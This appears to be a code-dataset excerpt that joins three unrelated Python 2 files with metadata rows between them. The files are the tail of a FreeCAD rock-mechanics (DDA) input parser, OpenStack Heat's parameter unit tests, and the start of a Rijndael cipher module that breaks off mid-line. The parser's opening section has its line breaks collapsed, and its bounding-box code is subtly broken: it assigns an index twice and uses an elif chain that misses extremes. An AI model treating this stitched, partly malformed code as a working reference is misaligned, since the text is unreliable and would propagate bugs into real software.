DDAJointSets.dataTable.refreshData(database.jointSets) database.slope = self.__slope DDAJointSets.slopeDataTable.refreshData(database.slope) database.tunnels = self.__tunnels DDATunnels.dataTable.refreshData(database.tunnels) # boundaryNodes pts = [tuple(p) for p in self.__boundaryNodes] pts.append(pts[0]) database.boundaryNodes = [DDAPolyLine( pts, 1)] # additional lines database.additionalLines = \ [DDALine((p[0],p[1],0) , (p[2],p[3],0) , p[4]) for p 
in self.__additionalLines] # material line database.materialLines = \ [DDALine((p[0],p[1],0) , (p[2],p[3],0) , p[4]) for p in self.__materialLines] # bolt element database.boltElements = \ [BoltElement((p[0],p[1],0) , (p[2],p[3],0) , p[4] , p[5] , p[6]) for p in self.__boltElements] # points database.fixedPoints = [DDAPoint(t[0],t[1]) for t in self.__fixedPoints] database.loadingPoints = [DDAPoint(t[0],t[1]) for t in self.__loadingPoints] database.measuredPoints = [DDAPoint(t[0],t[1]) for t in self.__measuredPoints] database.holePoints = [DDAPoint(t[0],t[1]) for t in self.__holePoints] self.reset() import Base Base.refreshAllShapes() class ParseDFInputParameters(BaseParseData): def __init__(self): self.__file = None self.reset() def reset(self): from DDADatabase import df_inputDatabase self.paras = df_inputDatabase.paras self.paras.reset() def __parseParaSchema(self): ''' parse parameters from DF parameters file :param infile: ''' for i in range(7): line = self.__file.getNextLine() t =self.parseFloatNum(line) if t==None: return False if i==0: self.paras.ifDynamic = float(t) elif i==1: self.paras.stepsNum = int(t) elif i==2: self.paras.blockMatsNum = int(t) elif i==3: self.paras.jointMatsNum = int(t) elif i==4: self.paras.ratio = t elif i==5: self.paras.OneSteptimeLimit = int(t) else: self.paras.springStiffness = int(t) print 'DF Para : IfDynamic: %d steps: %d blockMats: %d JointMats: %d Ratio: %f timeInterval: %d stiffness: %d'\ %(self.paras.ifDynamic, self.paras.stepsNum , self.paras.blockMatsNum , self.paras.jointMatsNum \ , self.paras.ratio, self.paras.OneSteptimeLimit, self.paras.springStiffness) print 'Df parameters schema done' return True def __parsePointsParameters(self): ''' parse parameters for fixed points and loading points :param infile: ''' # parse fixed points and loading points' type 0 : fixed points , 2: loading points # fixed points from DDADatabase import df_inputDatabase if len(df_inputDatabase.fixedPoints)>0: line = self.__file.getNextLine() nums = line.split() for i in nums: if self.parseIntNum(i)==None : return False print nums # loading points if len(df_inputDatabase.loadingPoints)>0: line = self.__file.getNextLine() nums = line.split() for i in nums: if self.parseIntNum(i)==None : return False print nums # parse loading points parameters (starttime , stressX , stressY , endtime , stressX , stressY) for i in range(len(df_inputDatabase.loadingPoints)): digits = [1]*6 line1 = self.__file.getNextLine() nums1 = line1.split() line2 = self.__file.getNextLine() nums2 = line2.split() for j in range(3): digits[j] = self.parseIntNum(nums1[j]) digits[j+3] = self.parseIntNum(nums2[j]) if None in digits: return False self.paras.loadingPointMats.append(digits) print nums1 , nums2 print 'fixed points and loading points done.' 
        return True

    def __parseBlocksAndJointsPara(self):
        '''
        parse parameters for blocks and joints
        :param infile:
        '''
        for i in range(self.paras.blockMatsNum):
            digits = [1]*14
            line1 = self.__file.getNextLine()
            nums1 = line1.split()
            for j in range(5):
                digits[j] = self.parseFloatNum(nums1[j])
            line2 = self.__file.getNextLine()
            nums2 = line2.split()
            line3 = self.__file.getNextLine()
            nums3 = line3.split()
            line4 = self.__file.getNextLine()
            nums4 = line4.split()
            for j in range(3):
                digits[j+5] = self.parseFloatNum(nums2[j])
                digits[j+8] = self.parseFloatNum(nums3[j])
                digits[j+11] = self.parseFloatNum(nums4[j])
            if None in digits:
                return False
            self.paras.blockMats.append(digits)
            print digits

        for i in range(self.paras.jointMatsNum):
            digits = [1]*3
            line = self.__file.getNextLine()
            nums = line.split()
            for j in range(3):
                digits[j] = self.parseFloatNum(nums[j])
            if None in digits:
                return False
            self.paras.jointMats.append(digits)
            print digits
        print 'DF blocks and block vertices\' parameters done.'
        return True

    def __parseRestPara(self ):
        '''
        parse SOR and axes
        :param infile:
        '''
        # parse SOR
        line = self.__file.getNextLine()
        self.paras.SOR = self.parseFloatNum(line)
        if self.paras.SOR==None:
            return False
        print 'SOR : ' , self.paras.SOR

        line = self.__file.getNextLine()
        nums = line.split()
        for i in range(3):
            if self.parseFloatNum(nums[i])==None:
                return False
        print nums
        print 'DF parameters all done.'
        return True

    def parse(self , path = None):
        self.reset()
        if not path:
            path = Base.__currentProjectPath__ + '/parameters.df'
        if not checkFileExists(path):
            return False
        self.__file = FileReader()
        self.__file.setFile(path)
        if not self.__parseParaSchema() or not self.__parsePointsParameters() \
            or not self.__parseBlocksAndJointsPara() or not self.__parseRestPara():
            return False
        return True

class ParseDFInputGraphData(BaseParseData):
    def __init__(self):
        self.__fileReader = None

    def GetResources(self):
        return {
            'Pixmap' : 'LoadDFInput',
            'MenuText': 'LoadDFInputData',
            'ToolTip': "Load DF Input Data"}

    def Activated(self):
        self.parse()
        import Base
        Base.changeStep4Stage('ShapesAvailable')

    def finish(self):
        pass

    def parse(self , path=None):
        self.refreshBlocksData()
        import Base
        if not path :
            path = Base.__currentProjectPath__+'/data.df'
        if not checkFileExists(path):
            return False
        file = open(path , "rb")
        if not self.__parseDataSchema(file) or not self.__parseBlocks(file) or \
            not self.__parseBlockVertices(file) or not self.__parseBoltElements(file) \
            or not self.__parsePoints(file):
            Base.showErrorMessageBox("DataError", 'invalid input data')
            return False
        return True

    def refreshBlocksData(self):
        import Base
        self.graph = Base.getDatabaser4CurrentStage()
        self.graph.reset()
        self.blocksNum = 0
        self.blockVerticesNum = 0
        self.fixedPointsNum = 0
        self.loadingPointsNum = 0
        self.measuredPointsNum = 0
        self.boltElementsNum = 0

    def __parseDataSchema(self , infile):
        line = infile.readline()
        nums = line.split()
        self.blocksNum = self.parseIntNum(nums[0])
        self.boltElementsNum = self.parseIntNum(nums[1])
        self.blockVerticesNum = self.parseIntNum(nums[2])
        line = infile.readline()
        nums = line.split()
        self.fixedPointsNum = self.parseIntNum(nums[0])
        self.loadingPointsNum = self.parseIntNum(nums[1])
        self.measuredPointsNum = self.parseIntNum(nums[2])
        if None in [self.blocksNum , self.boltElementsNum , self.blockVerticesNum \
                , self.fixedPointsNum , self.loadingPointsNum , self.measuredPointsNum]:
            return False
        print 'DF data : blocks : %d bolts : %d vertices : %d fixed Pnts :%d LoadingPnts :%d MeasuredPnts: %d' \
            %(self.blocksNum , self.boltElementsNum , 
self.blockVerticesNum \ , self.fixedPointsNum , self.loadingPointsNum , self.measuredPointsNum) return True def __parseBlocks(self , infile): ''' parsing blocks and try to get the maximum material No :param infile: ''' from DDADatabase import df_inputDatabase df_inputDatabase.blockMatCollections = set() blockMatCollection = df_inputDatabase.blockMatCollections for i in range(0 , self.blocksNum): line = infile.readline() nums = line.split() # get blocks' vertices' material No t0 = self.parseIntNum(nums[0]) t1 = self.parseIntNum(nums[1]) t2 = self.parseIntNum(nums[2]) if t0==None or t1==None or t2==None: return False tmpB = Block() tmpB.materialNo = t0 tmpB.startNo = t1 tmpB.endNo = t2 blockMatCollection.add(t0) self.graph.blocks.append(tmpB ) # print line , print 'DF blocks Info done.' return True def __parseBlockVertices(self,infile): ''' parsing blocks' vertices and try to get the maximum material No :param infile: ''' from DDADatabase import df_inputDatabase df_inputDatabase.jointMatCollections =set() jointMatCollection = df_inputDatabase.jointMatCollections ptsBounds = range(4) for i in range(self.blocksNum): tmpB = self.graph.blocks[i] for j in range(int(tmpB.endNo) - int(tmpB.startNo) +1): # read blocks vertices line = infile.readline() # print line nums = line.split() # get joint material No t0 = int(self.parseFloatNum(nums[0])) t1 = self.parseFloatNum(nums[1]) t2 = self.parseFloatNum(nums[2]) if t0==None or t1==None or t2==None: return False tmpB.vertices.append( (t0,t1,t2) ) jointMatCollection.add(t0) # get vertices' value boundary if i==0: ptsBounds[0]=ptsBounds[1] = t1 ptsBounds[2]=ptsBounds[2] = t2 else: if t1<ptsBounds[0]: ptsBounds[0]=t1 elif t1>ptsBounds[1]: ptsBounds[1]=t1 elif t2<ptsBounds[2]: ptsBounds[2]=t2 elif t2>ptsBounds[3]: ptsBounds[3]=t2 for i in range(4): # block parameters line = infile.readline() # print line nums = line.split() t0 = self.parseFloatNum(nums[0]) t1 = self.parseFloatNum(nums[1]) t2 = self.parseFloatNum(nums[2]) if t0==None or t1==None or t2==None: return False tmpB.parameters.extend([t0,t1,t2]) import Base margin = ptsBounds[1]-ptsBounds[0] if margin > (ptsBounds[3]-ptsBounds[2]): margin = ptsBounds[3]-ptsBounds[2] Base.__radius4Points__ = margin/60 print 'DF blocks vertices data done.' return True def __parseBoltElements(self , infile): for i in range(self.boltElementsNum): for j in range(3): line = infile.readline() print ' %d bolt elements parsed done'%self.boltElementsNum return True def parse1Point(self , line , point): #print line , nums = line.split() point.x = self.parseFloatNum(nums[0]) point.y = self.parseFloatNum(nums[1]) point.blockNo = int(self.parseFloatNum(nums[2])) def __parsePoints(self , infile): ''' parsing fixed , loading , and measured points :param infile: ''' for i in range(self.fixedPointsNum): pnt = FixedPoint() line = infile.readline() self.parse1Point(line , pnt) self.graph.fixedPoints.append(pnt) print ' fixed points : %d done'%self.fixedPointsNum for i in range(self.loadingPointsNum): pnt = LoadingPoint() line = infile.readline() self.parse1Point(line , pnt) self.graph.loadingPoints.append(pnt) print ' loading points : %d done'%self.loadingPointsNum for i in range(self.measuredPointsNum): pnt = MeasuredPoint() line = infile.readline() self.parse1Point(line , pnt) self.graph.measuredPoints.append(pnt) print ' measured points : %d done'%self.measuredPointsNum print 'DF points done.' 
return True class ParseAndLoadDCInputData(BaseParseData): def __init__(self): self.reset() self.__fileReader = FileReader() self.database = None def GetResources(self): return { 'Pixmap' : 'LoadDCInput', 'MenuText': 'LoadDCInputData', 'ToolTip': "Load DC Input Data"} def Activated(self): self.parse() import Base Base.changeStep4Stage('SpecialStep') import Base database = Base.getDatabaser4CurrentStage() database.clearRedoUndoList() def finish(self): pass def reset(self): self.jointLinesNum = 0 self.materialLinesNum = 0 self.additionalLinesNum = 0 self.boltElementsNum = 0 self.fixedPointsNum = 0 self.loadingPointsNum = 0 self.measuredPointsNum = 0 self.holePointsNum = 0 def __ParsePandect(self): # from DDADatabase import dc_inputDatabase self.__fileReader.getNextLine() # minimum edge length e0 nums = self.__fileReader.getNextLine().split() self.jointLinesNum = self.parseIntNum(nums[0]) # temperary code, I will try to revise this if I fully understand the data.dc self.database.boundaryLinesNum = self.parseIntNum(nums[1]) nums = self.__fileReader.getNextLine() self.materialLinesNum = self.parseIntNum(nums) nums = self.__fileReader.getNextLine() self.boltElementsNum = self.parseIntNum(nums) nums = self.__fileReader.getNextLine() self.fixedPointsNum = self.parseIntNum(nums) nums = self.__fileReader.getNextLine() self.loadingPointsNum = self.parseIntNum(nums) nums = self.__fileReader.getNextLine() self.measuredPointsNum = self.parseIntNum(nums) nums = self.__fileReader.getNextLine() self.holePointsNum = self.parseIntNum(nums) def __parseLines(self): # from DDADatabase import dc_inputDatabase # joint lines self.database.jointLines = [] for i in range(self.jointLinesNum): nums = self.__fileReader.getNextLine().split() jointMaterial = int(self.parseFloatNum(nums[4])) p1 = ( self.parseFloatNum(nums[0]) , self.parseFloatNum(nums[1]) , 0 ) p2 = ( self.parseFloatNum(nums[2]) , self.parseFloatNum(nums[3]) , 0 ) self.database.jointLines.append(DDALine(p1 , p2 , jointMaterial)) # material lines self.database.materialLines = [] for i in range(self.materialLinesNum): self.__fileReader.getNextLine() # bolt elements tmpNums = range(4) self.database.boltElements = [] for i in range(self.boltElementsNum): nums = self.__fileReader.getNextLine().split() for j in range(4): tmpNums[j] = self.parseFloatNum(nums[j], 'bolt element coordinate number') if tmpNums[j] == None : return False e0 = self.parseFloatNum(nums[4], 'bolt element e0') t0 = self.parseFloatNum(nums[5], 'bolt element t0') f0 = self.parseFloatNum(nums[6], 'bolt element f0') if e0==None or t0==None or f0==None : return False print 'block material %d :(%f , %f , %f , %f , %f , %f , %f)'%(i , tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3] , e0 , t0 , f0) self.database.boltElements.append(BoltElement(tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3] , e0 , t0 , f0)) def __parsePoints(self): # from DDADatabase import dc_inputDatabase import Base # fixed points windowInfo = [0 , 0 , 0 , 0] nums = self.__fileReader.getNextLine().split() p = (self.parseFloatNum(nums[0]) , self.parseFloatNum(nums[1]) , 0) self.database.fixedPoints.append( FixedPoint(p[0] , p[1])) windowInfo[0] = windowInfo[1] = p[0] windowInfo[2] = windowInfo[3] = p[1] for i in range(self.fixedPointsNum-1): nums = self.__fileReader.getNextLine().split() p = (self.parseFloatNum(nums[0]) , self.parseFloatNum(nums[1]) , 0) if p[0]<windowInfo[0]:windowInfo[0] = p[0] if p[0]>windowInfo[1]:windowInfo[1] = p[0] if p[1]<windowInfo[2]:windowInfo[2] = p[1] if p[1]>windowInfo[3]:windowInfo[3] = p[1] 
            self.database.fixedPoints.append( FixedPoint(p[0] , p[1]))
        Base.__radius4Points__ = (windowInfo[1] - windowInfo[0]) * 0.01
        Base.__windowInfo__ = windowInfo

        # loading points
        for i in range(self.loadingPointsNum):
            nums = self.__fileReader.getNextLine().split()
            self.database.loadingPoints.append( \
                LoadingPoint(self.parseFloatNum(nums[0]) , self.parseFloatNum(nums[1])))

        # measured points
        for i in range(self.measuredPointsNum):
            nums = self.__fileReader.getNextLine().split()
            self.database.measuredPoints.append( \
                MeasuredPoint(self.parseFloatNum(nums[0]) , self.parseFloatNum(nums[1])))

        # hole points
        for i in range(self.holePointsNum):
            nums = self.__fileReader.getNextLine().split()
            self.database.holePoints.append( \
                HolePoint(self.parseFloatNum(nums[0]) , self.parseFloatNum(nums[1])))

    def parse(self):
        import Base
        filename = Base.__currentProjectPath__ + '/data.dc'
        print 'try to read DC data from file : ' , filename
        # filename = Base.__currentProjectPath__ + '/tmpData.dc'
        self.__fileReader.setFile(filename)

        import DDADatabase
        self.database = DDADatabase.DCInputDatabase()
        self.reset()
        self.__ParsePandect()
        self.__parseLines()
        self.__parsePoints()
        self.__fileReader.closeFile()
        DDADatabase.dc_inputDatabase = self.database
        self.database = None


class DDALoadData():
    def __init__(self):
        self.current_path = Base.__currentProjectPath__

    def changeStage( self ):
        if Base.__currentStage__ == 'DL': # DL stage
            print 'switch to DL stage'
            self.parseData = ParseAndLoadDLData()
        elif Base.__currentStage__ == 'DC': # DC stage
            pass

    def GetResources(self):
        return {
                'MenuText': 'Load',
                'ToolTip': "Load DL data."}

    def __storeFileName(self , filename):
        '''
        store the name of the file being loaded
        '''
        file = open(self.current_path+'\\Ff.c' , 'wb')
        file.write(filename.strip().split('/')[-1])
        file.close()

    def __confirmLoadFile(self):
        '''
        when a new data file is loaded, the old shapes will be cleared,
        so we first have to confirm that the user really wants to do this.
        '''
        box = QtGui.QMessageBox()
        box.setText('New data will be imported , and old shapes will be wiped.')
        box.setInformativeText('Do you want to do this?')
        box.setStandardButtons(QtGui.QMessageBox.Ok | QtGui.QMessageBox.Cancel)
        box.setDefaultButton(QtGui.QMessageBox.Ok)
        ret = box.exec_()
        if ret == QtGui.QMessageBox.Ok:
            return True
        return False

    def Activated(self):
        self.changeStage()
        filename = str( QtGui.QFileDialog.getOpenFileName(None , 'please select input file' , self.current_path) )
        if not self.parseData.parse(filename):
            self.parseData.reset()
            print 'input data status : invalid'
            return False
        print 'input data status : ok'

        if self.__confirmLoadFile():
            self.__storeFileName(filename)
            self.parseData.save2Database()
            FreeCADGui.DDADisplayCmd.preview()

    def finish(self):
        pass

FreeCADGui.addCommand('DDA_LoadDLInputData', ParseAndLoadDLData())
FreeCADGui.addCommand('DDA_Load', DDALoadData())
FreeCADGui.addCommand('DDA_LoadDCInputData', ParseAndLoadDCInputData())
FreeCADGui.addCommand('DDA_LoadDFInputGraphData', ParseDFInputGraphData())
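# Illustrative sketch (not part of the original module): the bounding-box
# bookkeeping done inline in __parseBlockVertices and __parsePoints above,
# factored into a standalone helper. The name track_bounds is hypothetical.
def track_bounds(points):
    '''Return [xmin , xmax , ymin , ymax] for an iterable of (x , y) pairs.'''
    bounds = None
    for x , y in points:
        if bounds is None:
            bounds = [x , x , y , y] # initialise from the first point
        else:
            # x and y extremes are tracked independently of each other
            if x < bounds[0]: bounds[0] = x
            elif x > bounds[1]: bounds[1] = x
            if y < bounds[2]: bounds[2] = y
            elif y > bounds[3]: bounds[3] = y
    return bounds

# e.g. track_bounds([(0 , 0) , (2 , 1) , (-1 , 5)]) == [-1 , 2 , 0 , 5]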
lgpl-2.1
-3,771,634,351,096,124,000
36.414041
156
0.529423
false
Triv90/Heat
heat/tests/test_parameters.py
1
12606
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import unittest from nose.plugins.attrib import attr import json from heat.engine import parameters @attr(tag=['unit', 'parameters']) @attr(speed='fast') class ParameterTest(unittest.TestCase): def test_new_string(self): p = parameters.Parameter('p', {'Type': 'String'}) self.assertTrue(isinstance(p, parameters.StringParam)) def test_new_number(self): p = parameters.Parameter('p', {'Type': 'Number'}) self.assertTrue(isinstance(p, parameters.NumberParam)) def test_new_list(self): p = parameters.Parameter('p', {'Type': 'CommaDelimitedList'}) self.assertTrue(isinstance(p, parameters.CommaDelimitedListParam)) def test_new_bad_type(self): self.assertRaises(ValueError, parameters.Parameter, 'p', {'Type': 'List'}) def test_new_no_type(self): self.assertRaises(KeyError, parameters.Parameter, 'p', {'Default': 'blarg'}) def test_default_no_override(self): p = parameters.Parameter('defaulted', {'Type': 'String', 'Default': 'blarg'}) self.assertTrue(p.has_default()) self.assertEqual(p.default(), 'blarg') self.assertEqual(p.value(), 'blarg') def test_default_override(self): p = parameters.Parameter('defaulted', {'Type': 'String', 'Default': 'blarg'}, 'wibble') self.assertTrue(p.has_default()) self.assertEqual(p.default(), 'blarg') self.assertEqual(p.value(), 'wibble') def test_default_invalid(self): schema = {'Type': 'String', 'AllowedValues': ['foo'], 'ConstraintDescription': 'wibble', 'Default': 'bar'} try: parameters.Parameter('p', schema, 'foo') except ValueError as ve: msg = str(ve) self.assertNotEqual(msg.find('wibble'), -1) else: self.fail('ValueError not raised') def test_no_echo_true(self): p = parameters.Parameter('anechoic', {'Type': 'String', 'NoEcho': 'true'}, 'wibble') self.assertTrue(p.no_echo()) self.assertNotEqual(str(p), 'wibble') def test_no_echo_true_caps(self): p = parameters.Parameter('anechoic', {'Type': 'String', 'NoEcho': 'TrUe'}, 'wibble') self.assertTrue(p.no_echo()) self.assertNotEqual(str(p), 'wibble') def test_no_echo_false(self): p = parameters.Parameter('echoic', {'Type': 'String', 'NoEcho': 'false'}, 'wibble') self.assertFalse(p.no_echo()) self.assertEqual(str(p), 'wibble') def test_description(self): description = 'Description of the parameter' p = parameters.Parameter('p', {'Type': 'String', 'Description': description}) self.assertEqual(p.description(), description) def test_no_description(self): p = parameters.Parameter('p', {'Type': 'String'}) self.assertEqual(p.description(), '') def test_string_len_good(self): schema = {'Type': 'String', 'MinLength': '3', 'MaxLength': '3'} p = parameters.Parameter('p', schema, 'foo') self.assertEqual(p.value(), 'foo') def test_string_underflow(self): schema = {'Type': 'String', 'ConstraintDescription': 'wibble', 'MinLength': '4'} try: parameters.Parameter('p', schema, 'foo') except ValueError as ve: msg = str(ve) self.assertNotEqual(msg.find('wibble'), -1) else: self.fail('ValueError not raised') def test_string_overflow(self): schema = {'Type': 'String', 
'ConstraintDescription': 'wibble', 'MaxLength': '2'} try: parameters.Parameter('p', schema, 'foo') except ValueError as ve: msg = str(ve) self.assertNotEqual(msg.find('wibble'), -1) else: self.fail('ValueError not raised') def test_string_pattern_good(self): schema = {'Type': 'String', 'AllowedPattern': '[a-z]*'} p = parameters.Parameter('p', schema, 'foo') self.assertEqual(p.value(), 'foo') def test_string_pattern_bad_prefix(self): schema = {'Type': 'String', 'ConstraintDescription': 'wibble', 'AllowedPattern': '[a-z]*'} try: parameters.Parameter('p', schema, '1foo') except ValueError as ve: msg = str(ve) self.assertNotEqual(msg.find('wibble'), -1) else: self.fail('ValueError not raised') def test_string_pattern_bad_suffix(self): schema = {'Type': 'String', 'ConstraintDescription': 'wibble', 'AllowedPattern': '[a-z]*'} try: parameters.Parameter('p', schema, 'foo1') except ValueError as ve: msg = str(ve) self.assertNotEqual(msg.find('wibble'), -1) else: self.fail('ValueError not raised') def test_string_value_list_good(self): schema = {'Type': 'String', 'AllowedValues': ['foo', 'bar', 'baz']} p = parameters.Parameter('p', schema, 'bar') self.assertEqual(p.value(), 'bar') def test_string_value_list_bad(self): schema = {'Type': 'String', 'ConstraintDescription': 'wibble', 'AllowedValues': ['foo', 'bar', 'baz']} try: parameters.Parameter('p', schema, 'blarg') except ValueError as ve: msg = str(ve) self.assertNotEqual(msg.find('wibble'), -1) else: self.fail('ValueError not raised') def test_number_int_good(self): schema = {'Type': 'Number', 'MinValue': '3', 'MaxValue': '3'} p = parameters.Parameter('p', schema, '3') self.assertEqual(p.value(), '3') def test_number_float_good(self): schema = {'Type': 'Number', 'MinValue': '3.0', 'MaxValue': '3.0'} p = parameters.Parameter('p', schema, '3.0') self.assertEqual(p.value(), '3.0') def test_number_low(self): schema = {'Type': 'Number', 'ConstraintDescription': 'wibble', 'MinValue': '4'} try: parameters.Parameter('p', schema, '3') except ValueError as ve: msg = str(ve) self.assertNotEqual(msg.find('wibble'), -1) else: self.fail('ValueError not raised') def test_number_high(self): schema = {'Type': 'Number', 'ConstraintDescription': 'wibble', 'MaxValue': '2'} try: parameters.Parameter('p', schema, '3') except ValueError as ve: msg = str(ve) self.assertNotEqual(msg.find('wibble'), -1) else: self.fail('ValueError not raised') def test_number_value_list_good(self): schema = {'Type': 'Number', 'AllowedValues': ['1', '3', '5']} p = parameters.Parameter('p', schema, '5') self.assertEqual(p.value(), '5') def test_number_value_list_bad(self): schema = {'Type': 'Number', 'ConstraintDescription': 'wibble', 'AllowedValues': ['1', '3', '5']} try: parameters.Parameter('p', schema, '2') except ValueError as ve: msg = str(ve) self.assertNotEqual(msg.find('wibble'), -1) else: self.fail('ValueError not raised') def test_list_value_list_good(self): schema = {'Type': 'CommaDelimitedList', 'AllowedValues': ['foo', 'bar', 'baz']} p = parameters.Parameter('p', schema, 'baz,foo,bar') self.assertEqual(p.value(), 'baz,foo,bar') def test_list_value_list_bad(self): schema = {'Type': 'CommaDelimitedList', 'ConstraintDescription': 'wibble', 'AllowedValues': ['foo', 'bar', 'baz']} try: parameters.Parameter('p', schema, 'foo,baz,blarg') except ValueError as ve: msg = str(ve) self.assertNotEqual(msg.find('wibble'), -1) else: self.fail('ValueError not raised') params_schema = json.loads('''{ "Parameters" : { "User" : { "Type": "String" }, "Defaulted" : { "Type": "String", "Default": 
"foobar" } } }''') @attr(tag=['unit', 'parameters']) @attr(speed='fast') class ParametersTest(unittest.TestCase): def test_pseudo_params(self): params = parameters.Parameters('test_stack', {"Parameters": {}}) self.assertEqual(params['AWS::StackName'], 'test_stack') self.assertEqual(params['AWS::StackId'], 'None') self.assertTrue('AWS::Region' in params) def test_pseudo_param_stackid(self): params = parameters.Parameters('test_stack', {'Parameters': {}}, stack_id='123::foo') self.assertEqual(params['AWS::StackId'], '123::foo') params.set_stack_id('456::bar') self.assertEqual(params['AWS::StackId'], '456::bar') def test_user_param(self): user_params = {'User': 'wibble'} params = parameters.Parameters('test', params_schema, user_params) self.assertEqual(params.user_parameters(), user_params) def test_user_param_nonexist(self): params = parameters.Parameters('test', params_schema) self.assertEqual(params.user_parameters(), {}) def test_schema_invariance(self): params1 = parameters.Parameters('test', params_schema, {'Defaulted': 'wibble'}) self.assertEqual(params1['Defaulted'], 'wibble') params2 = parameters.Parameters('test', params_schema) self.assertEqual(params2['Defaulted'], 'foobar') def test_to_dict(self): template = {'Parameters': {'Foo': {'Type': 'String'}, 'Bar': {'Type': 'Number', 'Default': '42'}}} params = parameters.Parameters('test_params', template, {'Foo': 'foo'}) as_dict = dict(params) self.assertEqual(as_dict['Foo'], 'foo') self.assertEqual(as_dict['Bar'], '42') self.assertEqual(as_dict['AWS::StackName'], 'test_params') self.assertTrue('AWS::Region' in as_dict) def test_map(self): template = {'Parameters': {'Foo': {'Type': 'String'}, 'Bar': {'Type': 'Number', 'Default': '42'}}} params = parameters.Parameters('test_params', template, {'Foo': 'foo'}) expected = {'Foo': False, 'Bar': True, 'AWS::Region': True, 'AWS::StackId': True, 'AWS::StackName': True} self.assertEqual(params.map(lambda p: p.has_default()), expected) def test_map_str(self): template = {'Parameters': {'Foo': {'Type': 'String'}, 'Bar': {'Type': 'Number'}}} params = parameters.Parameters('test_params', template, { 'Foo': 'foo', 'Bar': 42}) expected = {'Foo': 'foo', 'Bar': '42', 'AWS::Region': 'ap-southeast-1', 'AWS::StackId': 'None', 'AWS::StackName': 'test_params'} self.assertEqual(params.map(str), expected)
apache-2.0
333,710,865,556,699,400
35.53913
79
0.523164
false
TheDSCPL/SSRE_2017-2018_group8
Projeto/Python/cryptopy/crypto/cipher/rijndael.py
1
14718
# -*- coding: utf-8 -*-
""" crypto.cipher.rijndael

    Rijndael encryption algorithm

    This byte oriented implementation is intended to closely match
    FIPS specification for readability. It is not implemented for
    performance.

    Copyright © (c) 2002 by Paul A. Lambert
    Read LICENSE.txt for license information.

    2002-06-01
"""
from crypto.cipher.base import BlockCipher, padWithPadLen, noPadding

class Rijndael(BlockCipher):
    """ Rijndael encryption algorithm """
    def __init__(self, key = None, padding = padWithPadLen(), keySize=16, blockSize=16 ):
        self.name = 'RIJNDAEL'
        self.keySize = keySize
        self.strength = keySize*8
        self.blockSize = blockSize # blockSize is in bytes
        self.padding = padding # change default to noPadding() to get normal ECB behavior

        assert( keySize%4==0 and NrTable[4].has_key(keySize/4)),'key size must be 16,20,24,28 or 32 bytes'
        assert( blockSize%4==0 and NrTable.has_key(blockSize/4)), 'block size must be 16,20,24,28 or 32 bytes'

        self.Nb = self.blockSize/4 # Nb is number of columns of 32 bit words
        self.Nk = keySize/4 # Nk is the key length in 32-bit words
        self.Nr = NrTable[self.Nb][self.Nk] # The number of rounds (Nr) is a function of
                                            # the block (Nb) and key (Nk) sizes.
        if key != None:
            self.setKey(key)

    def setKey(self, key):
        """ Set a key and generate the expanded key """
        assert( len(key) == (self.Nk*4) ), 'Key length must be same as keySize parameter'
        self.__expandedKey = keyExpansion(self, key)
        self.reset() # BlockCipher.reset()

    def encryptBlock(self, plainTextBlock):
        """ Encrypt a block, plainTextBlock must be an array of bytes [Nb by 4] """
        self.state = self._toBlock(plainTextBlock)
        AddRoundKey(self, self.__expandedKey[0:self.Nb])
        for round in range(1,self.Nr): #for round = 1 step 1 to Nr-1
            SubBytes(self)
            ShiftRows(self)
            MixColumns(self)
            AddRoundKey(self, self.__expandedKey[round*self.Nb:(round+1)*self.Nb])
        SubBytes(self)
        ShiftRows(self)
        AddRoundKey(self, self.__expandedKey[self.Nr*self.Nb:(self.Nr+1)*self.Nb])
        return self._toBString(self.state)

    def decryptBlock(self, encryptedBlock):
        """ decrypt a block (array of bytes) """
        self.state = self._toBlock(encryptedBlock)
        AddRoundKey(self, self.__expandedKey[self.Nr*self.Nb:(self.Nr+1)*self.Nb])
        for round in range(self.Nr-1,0,-1):
            InvShiftRows(self)
            InvSubBytes(self)
            AddRoundKey(self, self.__expandedKey[round*self.Nb:(round+1)*self.Nb])
            InvMixColumns(self)
        InvShiftRows(self)
        InvSubBytes(self)
        AddRoundKey(self, self.__expandedKey[0:self.Nb])
        return self._toBString(self.state)

    def _toBlock(self, bs):
        """ Convert binary string to array of bytes, state[col][row]"""
        assert ( len(bs) == 4*self.Nb ), 'Rijndael blocks must be of size blockSize'
        return [[ord(bs[4*i]),ord(bs[4*i+1]),ord(bs[4*i+2]),ord(bs[4*i+3])] for i in range(self.Nb)]

    def _toBString(self, block):
        """ Convert block (array of bytes) to binary string """
        l = []
        for col in block:
            for rowElement in col:
                l.append(chr(rowElement))
        return ''.join(l)
#-------------------------------------
"""    Number of rounds Nr = NrTable[Nb][Nk]

        Nb  Nk=4   Nk=5   Nk=6   Nk=7   Nk=8
        -------------------------------------   """
NrTable = {4: {4:10, 5:11, 6:12, 7:13, 8:14},
           5: {4:11, 5:11, 6:12, 7:13, 8:14},
           6: {4:12, 5:12, 6:12, 7:13, 8:14},
           7: {4:13, 5:13, 6:13, 7:13, 8:14},
           8: {4:14, 5:14, 6:14, 7:14, 8:14}}
#-------------------------------------
def keyExpansion(algInstance, keyString):
    """ Expand a string of size keySize into a larger array """
    Nk, Nb, Nr = algInstance.Nk, algInstance.Nb, algInstance.Nr # for readability
    key = [ord(byte) for byte in keyString] # convert string to list
    w = 
